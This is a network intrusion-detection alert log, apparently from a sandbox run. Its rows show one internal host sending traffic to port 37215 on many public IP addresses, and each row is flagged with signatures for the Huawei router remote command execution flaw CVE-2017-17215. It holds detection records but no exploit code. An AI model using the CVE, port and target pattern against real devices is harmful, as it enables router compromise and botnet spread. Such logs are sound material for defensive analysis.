                                                    07/10/24-08:26:57.673199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505637215192.168.2.14197.140.74.19
                                                    07/10/24-08:26:59.632292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269837215192.168.2.1425.176.141.18
                                                    07/10/24-08:26:59.675838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4898037215192.168.2.14181.121.95.154
                                                    07/10/24-08:27:07.342964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4530037215192.168.2.1441.120.139.253
                                                    07/10/24-08:27:22.472271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158237215192.168.2.14157.154.59.139
                                                    07/10/24-08:27:27.063250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4976437215192.168.2.14157.77.88.141
                                                    07/10/24-08:26:25.453376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014437215192.168.2.1441.173.230.203
                                                    07/10/24-08:27:22.932335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332237215192.168.2.1458.22.69.27
                                                    07/10/24-08:27:30.505029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721037215192.168.2.14197.199.18.59
                                                    07/10/24-08:26:34.231574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4171437215192.168.2.1441.133.166.242
                                                    07/10/24-08:27:32.572327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355237215192.168.2.14197.64.29.195
                                                    07/10/24-08:27:08.392563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030637215192.168.2.1420.138.249.148
                                                    07/10/24-08:26:14.814365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5486637215192.168.2.14197.44.135.217
                                                    07/10/24-08:27:31.526473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5047237215192.168.2.14197.154.7.204
                                                    07/10/24-08:27:05.172192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4944437215192.168.2.1441.46.19.222
                                                    07/10/24-08:26:14.775624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6096637215192.168.2.14197.130.77.169
                                                    07/10/24-08:26:20.172679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922837215192.168.2.14117.35.158.23
                                                    07/10/24-08:27:22.900850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5908437215192.168.2.144.202.212.150
                                                    07/10/24-08:27:23.452123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3805437215192.168.2.14197.42.38.140
                                                    07/10/24-08:27:31.468689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5838037215192.168.2.14197.100.17.24
                                                    07/10/24-08:26:47.860875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629437215192.168.2.14197.2.167.163
                                                    07/10/24-08:27:19.340443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110437215192.168.2.1441.195.224.186
                                                    07/10/24-08:26:22.276470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381637215192.168.2.14197.210.53.160
                                                    07/10/24-08:26:28.841879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819637215192.168.2.14157.186.145.245
                                                    07/10/24-08:26:34.220907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5306837215192.168.2.14197.197.114.253
                                                    07/10/24-08:26:43.778762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663837215192.168.2.1441.36.72.240
                                                    07/10/24-08:26:20.190530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564837215192.168.2.1441.235.101.163
                                                    07/10/24-08:27:13.714524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694637215192.168.2.14197.4.144.211
                                                    07/10/24-08:27:27.169986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4603637215192.168.2.14157.16.165.58
                                                    07/10/24-08:26:31.092800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439837215192.168.2.14197.147.221.170
                                                    07/10/24-08:26:42.409731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376837215192.168.2.14157.129.62.150
                                                    07/10/24-08:26:17.984415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5386837215192.168.2.14119.130.55.50
                                                    07/10/24-08:27:11.547774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602437215192.168.2.14157.177.141.204
                                                    07/10/24-08:26:59.768994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572037215192.168.2.1434.105.143.158
                                                    07/10/24-08:27:20.520093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5929637215192.168.2.1441.39.128.18
                                                    07/10/24-08:26:29.775539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4046037215192.168.2.14134.148.23.94
                                                    07/10/24-08:27:02.740584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556037215192.168.2.14157.146.100.182
                                                    07/10/24-08:27:11.533118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4707437215192.168.2.1441.40.246.181
                                                    07/10/24-08:27:30.466887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5514037215192.168.2.1450.224.90.219
                                                    07/10/24-08:26:18.025599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575637215192.168.2.14157.231.29.98
                                                    07/10/24-08:26:41.437345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926837215192.168.2.14157.198.252.59
                                                    07/10/24-08:27:14.867755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501837215192.168.2.1441.115.30.28
                                                    07/10/24-08:26:31.061438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566637215192.168.2.1454.206.33.31
                                                    07/10/24-08:26:23.350610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3993837215192.168.2.14157.176.136.90
                                                    07/10/24-08:27:13.955612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3888837215192.168.2.14197.201.232.177
                                                    07/10/24-08:27:03.000855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157237215192.168.2.14197.102.230.72
                                                    07/10/24-08:27:13.878824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739637215192.168.2.14129.254.241.164
                                                    07/10/24-08:27:31.489680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825037215192.168.2.14157.243.188.61
                                                    07/10/24-08:26:47.844499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300037215192.168.2.1441.189.27.230
                                                    07/10/24-08:27:10.547340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488837215192.168.2.14197.228.23.235
                                                    07/10/24-08:26:26.563571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721237215192.168.2.14157.79.119.229
                                                    07/10/24-08:26:20.152800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3372037215192.168.2.14157.202.12.31
                                                    07/10/24-08:26:49.900161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402437215192.168.2.14203.171.241.0
                                                    07/10/24-08:26:59.564430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155437215192.168.2.14197.11.2.72
                                                    07/10/24-08:27:28.183370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5601837215192.168.2.1441.54.65.19
                                                    07/10/24-08:27:33.866753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684637215192.168.2.14162.176.173.9
                                                    07/10/24-08:26:15.862104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691237215192.168.2.14153.151.82.223
                                                    07/10/24-08:26:18.011298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4103237215192.168.2.14197.228.233.129
                                                    07/10/24-08:26:36.382333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4931837215192.168.2.14197.26.73.122
                                                    07/10/24-08:26:13.770173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4558037215192.168.2.14157.174.22.21
                                                    07/10/24-08:26:52.039541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629637215192.168.2.1441.163.82.204
                                                    07/10/24-08:26:34.233707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4292437215192.168.2.14157.52.34.207
                                                    07/10/24-08:26:13.741925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543237215192.168.2.14157.76.20.6
                                                    07/10/24-08:26:43.796387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684837215192.168.2.1466.83.29.153
                                                    07/10/24-08:26:25.423394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4424037215192.168.2.14165.209.123.17
                                                    07/10/24-08:26:57.649894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4061437215192.168.2.14157.2.255.81
                                                    07/10/24-08:27:23.948745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4464237215192.168.2.14197.95.144.193
                                                    07/10/24-08:26:28.772141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5879237215192.168.2.14211.191.171.246
                                                    07/10/24-08:26:57.521887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5551437215192.168.2.14211.73.177.221
                                                    07/10/24-08:27:14.853796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530037215192.168.2.1441.190.219.39
                                                    07/10/24-08:27:23.848972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534237215192.168.2.14157.139.231.103
                                                    07/10/24-08:27:24.975422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4047237215192.168.2.1441.115.113.250
                                                    07/10/24-08:27:31.463838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4623637215192.168.2.14157.85.5.68
                                                    07/10/24-08:26:13.748733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316637215192.168.2.1441.27.160.130
                                                    07/10/24-08:27:02.834804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200837215192.168.2.1441.178.231.165
                                                    07/10/24-08:27:22.919171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4277037215192.168.2.1441.158.56.218
                                                    07/10/24-08:26:28.803764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3592837215192.168.2.145.139.159.233
                                                    07/10/24-08:27:08.455887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598237215192.168.2.14157.219.178.161
                                                    07/10/24-08:26:31.095355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5378037215192.168.2.1412.11.255.68
                                                    07/10/24-08:26:59.768994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031237215192.168.2.14197.172.23.220
                                                    07/10/24-08:27:02.995809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898637215192.168.2.1441.254.248.237
                                                    07/10/24-08:26:41.493980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4191837215192.168.2.14156.220.189.16
                                                    07/10/24-08:26:11.541811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239637215192.168.2.14157.33.128.64
                                                    07/10/24-08:26:25.522257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408837215192.168.2.14157.183.221.176
                                                    07/10/24-08:26:49.858364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148437215192.168.2.14157.226.202.107
                                                    07/10/24-08:26:25.499422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4308637215192.168.2.1441.113.121.243
                                                    07/10/24-08:26:36.376968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4123837215192.168.2.14157.68.81.25
                                                    07/10/24-08:26:11.658896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713237215192.168.2.14197.246.39.163
                                                    07/10/24-08:26:15.872361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930237215192.168.2.14223.21.243.90
                                                    07/10/24-08:27:02.908970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859837215192.168.2.1441.214.245.2
                                                    07/10/24-08:27:30.558809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4342637215192.168.2.14197.202.22.95
                                                    07/10/24-08:26:36.339943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4533037215192.168.2.14157.108.80.140
                                                    07/10/24-08:27:13.897664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252237215192.168.2.14197.149.208.1
                                                    07/10/24-08:27:30.487311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871237215192.168.2.1470.170.246.233
                                                    07/10/24-08:26:59.667769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003837215192.168.2.1431.189.158.150
                                                    07/10/24-08:27:22.838932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3978637215192.168.2.1441.79.104.83
                                                    07/10/24-08:27:08.427653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785237215192.168.2.1441.83.87.106
                                                    07/10/24-08:27:05.164336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4533237215192.168.2.1441.149.209.243
                                                    07/10/24-08:26:13.835894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3519437215192.168.2.1441.188.57.140
                                                    07/10/24-08:27:30.556731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026237215192.168.2.1441.244.24.133
                                                    07/10/24-08:27:07.396195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486437215192.168.2.1441.168.112.84
                                                    07/10/24-08:26:45.652788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4337637215192.168.2.14157.103.171.102
                                                    07/10/24-08:27:20.476661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024837215192.168.2.14197.163.83.184
                                                    07/10/24-08:26:47.746309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4019837215192.168.2.14157.36.66.164
                                                    07/10/24-08:26:22.285937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5251237215192.168.2.14157.18.67.186
                                                    07/10/24-08:27:08.349931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3526837215192.168.2.14157.44.91.188
                                                    07/10/24-08:26:43.550517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4918837215192.168.2.14157.203.46.217
                                                    07/10/24-08:27:11.512071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5640837215192.168.2.1441.239.68.73
                                                    07/10/24-08:27:05.102100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4424037215192.168.2.14183.161.211.151
                                                    07/10/24-08:26:13.828351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866637215192.168.2.14197.207.60.35
                                                    07/10/24-08:27:23.931354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4949437215192.168.2.14157.173.235.80
                                                    07/10/24-08:26:20.148495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4465637215192.168.2.14197.132.42.198
                                                    07/10/24-08:26:20.189377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4790637215192.168.2.1440.5.204.216
                                                    07/10/24-08:26:26.483637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3368437215192.168.2.14197.58.21.63
                                                    07/10/24-08:26:41.569815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3667637215192.168.2.14169.116.1.158
                                                    07/10/24-08:27:31.559678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655437215192.168.2.1441.131.40.167
                                                    07/10/24-08:26:11.190243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582837215192.168.2.14157.51.85.78
                                                    07/10/24-08:26:36.395697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060437215192.168.2.14216.6.246.66
                                                    07/10/24-08:26:41.539948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814637215192.168.2.14197.253.61.210
                                                    07/10/24-08:26:17.981356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983837215192.168.2.1441.218.105.156
                                                    07/10/24-08:26:28.868107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494437215192.168.2.14157.124.147.209
                                                    07/10/24-08:27:27.077199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5801837215192.168.2.14197.163.189.2
                                                    07/10/24-08:27:28.093525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849437215192.168.2.14170.47.142.199
                                                    07/10/24-08:27:13.761850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4677037215192.168.2.1441.112.7.81
                                                    07/10/24-08:26:28.782504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819237215192.168.2.14157.210.100.202
                                                    07/10/24-08:26:29.781347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223237215192.168.2.1441.39.91.118
                                                    07/10/24-08:26:29.826099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3567437215192.168.2.14197.56.123.161
                                                    07/10/24-08:26:33.247201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4819437215192.168.2.14197.131.154.97
                                                    07/10/24-08:26:59.657885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663037215192.168.2.1441.219.183.79
                                                    07/10/24-08:26:20.148665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309237215192.168.2.1441.173.170.11
                                                    07/10/24-08:27:27.142531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739037215192.168.2.14104.125.244.255
                                                    07/10/24-08:26:11.136584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042037215192.168.2.1441.30.137.212
                                                    07/10/24-08:26:45.598670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4116237215192.168.2.1441.64.207.240
                                                    07/10/24-08:27:20.466176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4899237215192.168.2.1441.170.203.43
                                                    07/10/24-08:27:13.869693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3562037215192.168.2.1467.121.186.62
                                                    07/10/24-08:27:08.439576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6089637215192.168.2.14157.197.97.197
                                                    07/10/24-08:27:10.548037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4952037215192.168.2.14197.168.74.170
                                                    07/10/24-08:27:02.883243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476837215192.168.2.1434.62.28.205
                                                    07/10/24-08:26:31.086358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283237215192.168.2.14157.230.159.3
                                                    07/10/24-08:26:25.515269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5640237215192.168.2.14197.25.3.236
                                                    07/10/24-08:26:13.672822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009237215192.168.2.14197.228.49.100
                                                    07/10/24-08:27:10.629936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516437215192.168.2.14157.25.105.185
                                                    07/10/24-08:26:34.246855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4751837215192.168.2.1441.47.221.145
                                                    07/10/24-08:27:22.835160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240037215192.168.2.14197.142.69.84
                                                    07/10/24-08:27:27.164992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630637215192.168.2.1462.41.68.15
                                                    07/10/24-08:26:38.596849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402437215192.168.2.1441.170.158.140
                                                    07/10/24-08:26:31.069950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5781837215192.168.2.14157.86.157.103
                                                    07/10/24-08:26:42.455188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382437215192.168.2.14197.74.244.113
                                                    07/10/24-08:26:49.772453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856837215192.168.2.1441.164.233.213
                                                    07/10/24-08:26:53.207305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631637215192.168.2.14140.74.132.175
                                                    07/10/24-08:26:53.184219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681837215192.168.2.1441.28.250.224
                                                    07/10/24-08:26:11.617783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317037215192.168.2.14197.159.41.215
                                                    07/10/24-08:26:28.907657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5321037215192.168.2.14197.87.71.231
                                                    07/10/24-08:26:45.684661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6035837215192.168.2.14162.155.214.86
                                                    07/10/24-08:27:17.074634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3692237215192.168.2.14138.119.35.84
                                                    07/10/24-08:26:22.231914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3438437215192.168.2.1441.96.135.42
                                                    07/10/24-08:27:33.901645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3685037215192.168.2.1441.255.247.55
                                                    07/10/24-08:27:33.908493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5914437215192.168.2.1441.200.75.36
                                                    07/10/24-08:26:23.356151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4565437215192.168.2.1441.136.55.227
                                                    07/10/24-08:27:02.883377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052237215192.168.2.1441.143.34.241
                                                    07/10/24-08:27:02.859176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408437215192.168.2.14157.121.72.226
                                                    07/10/24-08:26:55.454904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475637215192.168.2.1441.193.12.185
                                                    07/10/24-08:26:55.453359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515237215192.168.2.14157.60.160.3
                                                    07/10/24-08:27:14.882178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398237215192.168.2.14197.196.12.35
                                                    07/10/24-08:26:33.247201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5493437215192.168.2.14197.4.41.65
                                                    07/10/24-08:26:34.196325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257837215192.168.2.14197.98.123.55
                                                    07/10/24-08:26:38.590272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171237215192.168.2.14157.70.187.18
                                                    07/10/24-08:26:49.897111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3415437215192.168.2.14161.41.215.47
                                                    07/10/24-08:26:15.874379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3391437215192.168.2.14116.42.107.254
                                                    07/10/24-08:26:41.372745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4051437215192.168.2.1441.177.10.113
                                                    07/10/24-08:26:11.600235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314437215192.168.2.14157.107.162.53
                                                    07/10/24-08:27:10.668166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392837215192.168.2.1441.151.63.84
                                                    07/10/24-08:26:25.469425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5925437215192.168.2.14197.125.77.89
                                                    07/10/24-08:27:05.193569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478837215192.168.2.14197.86.3.200
                                                    07/10/24-08:27:14.878882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542037215192.168.2.1413.105.59.13
                                                    07/10/24-08:27:24.926927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373437215192.168.2.14141.192.128.74
                                                    07/10/24-08:26:57.631103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6043237215192.168.2.14217.152.98.140
                                                    07/10/24-08:26:28.791726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291437215192.168.2.14157.234.227.89
                                                    07/10/24-08:26:38.630697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3325637215192.168.2.1473.200.49.191
                                                    07/10/24-08:26:57.593962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304437215192.168.2.14179.81.193.190
                                                    07/10/24-08:26:43.906584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5841437215192.168.2.14197.19.54.153
                                                    07/10/24-08:26:53.135009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572237215192.168.2.14177.51.179.21
                                                    07/10/24-08:27:19.196013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4622237215192.168.2.14203.191.81.179
                                                    07/10/24-08:27:24.990905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4039637215192.168.2.14157.214.214.34
                                                    07/10/24-08:27:08.451295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5483237215192.168.2.14157.157.243.191
                                                    07/10/24-08:26:55.302858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4303237215192.168.2.14165.195.135.86
